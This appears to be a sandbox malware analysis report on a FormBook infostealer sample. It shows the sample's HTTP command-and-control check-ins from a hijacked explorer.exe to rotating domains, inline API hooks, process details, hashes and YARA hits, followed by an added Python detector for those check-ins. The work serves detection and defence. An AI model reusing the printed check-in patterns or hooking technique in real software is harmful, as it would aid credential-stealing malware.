Nov 26, 2020 08:26:34.228813887 CET  4477                OUT        GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1
                                                                                      Host: www.bitcoincandy.xyz
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:26:34.406599045 CET  4478                IN         HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx/1.16.1
                                                                                      Date: Thu, 26 Nov 2020 07:26:34 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Location: https://allassetcoins.com/cipherdomains/orbitdex.html?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w==
                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
5           192.168.2.7  49761        23.227.38.74     80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:26:54.667975903 CET  4478                OUT        GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nairobi-paris.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:26:54.805349112 CET  4480                IN         HTTP/1.1 403 Forbidden
                                                                                      Date: Thu, 26 Nov 2020 07:26:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      X-Sorting-Hat-PodId: 148
                                                                                      X-Sorting-Hat-ShopId: 44763218069
                                                                                      X-Dc: gcp-us-central1
                                                                                      X-Request-ID: 2028a74b-b7b9-48b6-93d3-00e4e019a57b
                                                                                      X-Download-Options: noopen
                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      cf-request-id: 06a50bc0d200002bc61585c000000001
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 5f81e247b9b72bc6-FRA
                                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
6           192.168.2.7  49762        34.102.136.180   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:27:15.070194006 CET  4486                OUT        GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1
                                                                                      Host: www.multitask-improvements.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Timestamp: Nov 26, 2020 08:27:15.187453032 CET
kBytes transferred: 4486
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 07:27:15 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c9ca-113"
Via: 1.1 google
Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 7
Source IP: 192.168.2.7
Source Port: 49763
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:27:58.063796997 CET
kBytes transferred: 4487
Direction: OUT
Data:
GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1
Host: www.affiliateclubindia.com
Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Timestamp: Nov 26, 2020 08:27:58.179707050 CET
kBytes transferred: 4488
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 07:27:58 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 8
Source IP: 192.168.2.7
Source Port: 49767
Destination IP: 192.185.199.129
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:28:18.988131046 CET
kBytes transferred: 4597
Direction: OUT
Data:
GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1
Host: www.chartershome.com
Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Timestamp: Nov 26, 2020 08:28:19.201641083 CET
kBytes transferred: 4598
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Thu, 26 Nov 2020 07:28:19 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 23 Apr 2019 06:15:09 GMT
Accept-Ranges: bytes
Content-Length: 11816
Vary: Accept-Encoding
Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 
70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut


Session ID: 9
Source IP: 192.168.2.7
Source Port: 49770
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:28:39.575417995 CET
kBytes transferred: 4623
Direction: OUT
Data:
GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1
Host: www.nationshiphop.com
Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Timestamp: Nov 26, 2020 08:28:39.690175056 CET
kBytes transferred: 4623
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 07:28:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
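
The four HTTP sessions above (6 to 9) share one shape: a GET issued by explorer.exe, a different Host header each time, the same path /hko6/, two query parameters of which one (3f_X=Q2J8lT4hKB4) never changes while the other is a fresh base64 blob, no User-Agent, and a 7-byte all-NUL body on a GET. The script below is an added example, not code from the report or from the sample, that turns those observations into a check over HTTP request records. The record layout (SAMPLE_SESSIONS) and the SYSTEM_PROCESSES list are assumptions made for the example; the hosts, URIs, process name, body and timestamps are copied from the sessions above.

```python
"""Flag FormBook-style HTTP check-ins in HTTP request records.

Added example, not code from the Joe Sandbox report or from the sample.
The record layout below is constructed for this example; the hosts, URIs,
process name, request body and timestamps come from sessions 6-9 above.
"""
from collections import defaultdict
from datetime import datetime

# Constructed records, one per HTTP session in the report (second precision).
SAMPLE_SESSIONS = [
    {"id": 6, "ts": "2020-11-26 08:27:15", "process": r"C:\Windows\explorer.exe",
     "request_line": "GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1",
     "headers": {"Host": "www.multitask-improvements.com", "Connection": "close"},
     "body": b"\x00" * 7, "status": 403},
    {"id": 7, "ts": "2020-11-26 08:27:58", "process": r"C:\Windows\explorer.exe",
     "request_line": "GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1",
     "headers": {"Host": "www.affiliateclubindia.com", "Connection": "close"},
     "body": b"\x00" * 7, "status": 403},
    {"id": 8, "ts": "2020-11-26 08:28:18", "process": r"C:\Windows\explorer.exe",
     "request_line": "GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1",
     "headers": {"Host": "www.chartershome.com", "Connection": "close"},
     "body": b"\x00" * 7, "status": 404},
    {"id": 9, "ts": "2020-11-26 08:28:39", "process": r"C:\Windows\explorer.exe",
     "request_line": "GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1",
     "headers": {"Host": "www.nationshiphop.com", "Connection": "close"},
     "body": b"\x00" * 7, "status": 403},
]

# Windows processes that should not be building raw HTTP requests themselves.
# Starting list assumed for this example; tune it to your environment.
SYSTEM_PROCESSES = {"explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}


def parse_request_line(request_line):
    """Split 'GET /path?k=v&k2=v2 HTTP/1.1' into (method, path, {k: v}).

    The query is split by hand rather than with urllib.parse.parse_qs: the
    values are raw base64 containing '+', '/' and '=', and parse_qs would
    turn '+' into a space and silently alter them.
    """
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")  # first '=' only: keeps base64 padding
            params[name] = value
    return method, path, params


def process_name(image_path):
    """Lower-case file name from a Windows image path (works off-Windows too)."""
    return image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def session_indicators(session):
    """Per-request indicators as human-readable reasons (empty = nothing odd)."""
    reasons = []
    method, _path, _params = parse_request_line(session["request_line"])
    body = session["body"]
    if method == "GET" and body:
        reasons.append(f"GET request carries a {len(body)}-byte body")
    if body and set(body) == {0}:
        reasons.append("request body is all NUL bytes")
    proc = process_name(session["process"])
    if proc in SYSTEM_PROCESSES:
        reasons.append(f"issued by system process {proc}")
    if "User-Agent" not in session["headers"]:
        reasons.append("no User-Agent header")
    return reasons


def correlate_checkins(sessions, min_hosts=3):
    """Find a fixed (path, parameter value) reused across distinct Host headers.

    In the capture the Host rotates per request while the path and the value
    of one query parameter stay constant.  Parameter order varies (session 8
    sends rL0 first), so sessions are keyed on the sorted set of parameter
    names, not on the raw query string.
    """
    hosts_by_value = defaultdict(lambda: defaultdict(set))  # key -> (name, value) -> hosts
    stamps = defaultdict(list)
    for s in sessions:
        _method, path, params = parse_request_line(s["request_line"])
        key = (path, tuple(sorted(params)))
        host = s["headers"].get("Host", "")
        for name, value in params.items():
            hosts_by_value[key][(name, value)].add(host)
        stamps[key].append(datetime.strptime(s["ts"], "%Y-%m-%d %H:%M:%S"))
    clusters = []
    for key, per_value in hosts_by_value.items():
        for (name, value), hosts in per_value.items():
            if len(hosts) >= min_hosts:
                span = (max(stamps[key]) - min(stamps[key])).total_seconds()
                clusters.append({"path": key[0], "param_names": key[1],
                                 "constant_param": name, "constant_value": value,
                                 "hosts": sorted(hosts), "span_seconds": span})
    return clusters


def analyse(sessions):
    """Return ({session id: reasons}, [clusters]) for a batch of sessions."""
    return ({s["id"]: session_indicators(s) for s in sessions},
            correlate_checkins(sessions))


if __name__ == "__main__":
    per_session, clusters = analyse(SAMPLE_SESSIONS)
    for sid, reasons in per_session.items():
        print(f"session {sid}: " + ("; ".join(reasons) or "nothing unusual"))
    for c in clusters:
        print(f"shared check-in: path={c['path']} {c['constant_param']}={c['constant_value']} "
              f"across {len(c['hosts'])} hosts in {c['span_seconds']:.0f}s: {', '.join(c['hosts'])}")
```

On the four sessions the per-request checks fire on every record, and the correlation reports one cluster: path /hko6/ with 3f_X=Q2J8lT4hKB4 reused across four hosts within 84 seconds. The correlation works on the request side only: every response here was a 403 or 404, so none of the four hosts answered as a live C2 in this run, and the host list is not by itself evidence that any of them is attacker-controlled. The per-request indicator that matches the report's own "System process connects to network" signature is the explorer.exe one; a GET with a body and no User-Agent is a useful supporting signal but would need the process or the correlation to confirm.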


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

Function Name    Hook Type    Active in Processes
PeekMessageA     INLINE       explorer.exe
PeekMessageW     INLINE       explorer.exe
GetMessageW      INLINE       explorer.exe
GetMessageA      INLINE       explorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
Function Name    Hook Type    New Data
PeekMessageA     INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEA
PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEA
GetMessageW      INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEA
GetMessageA      INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEA

                                                                                      Statistics

                                                                                      Behavior


                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:08:23:27
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Users\user\Desktop\inv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\inv.exe'
                                                                                      Imagebase:0x970000
                                                                                      File size:494592 bytes
                                                                                      MD5 hash:55F30220E8A613753F178FB901E5E5A6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:08:23:28
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:08:23:28
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Users\user\Desktop\inv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\inv.exe
                                                                                      Imagebase:0x970000
                                                                                      File size:494592 bytes
                                                                                      MD5 hash:55F30220E8A613753F178FB901E5E5A6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:08:23:33
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff662bf0000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:08:23:46
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\SysWOW64\systray.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:9728 bytes
                                                                                      MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: Joe Security
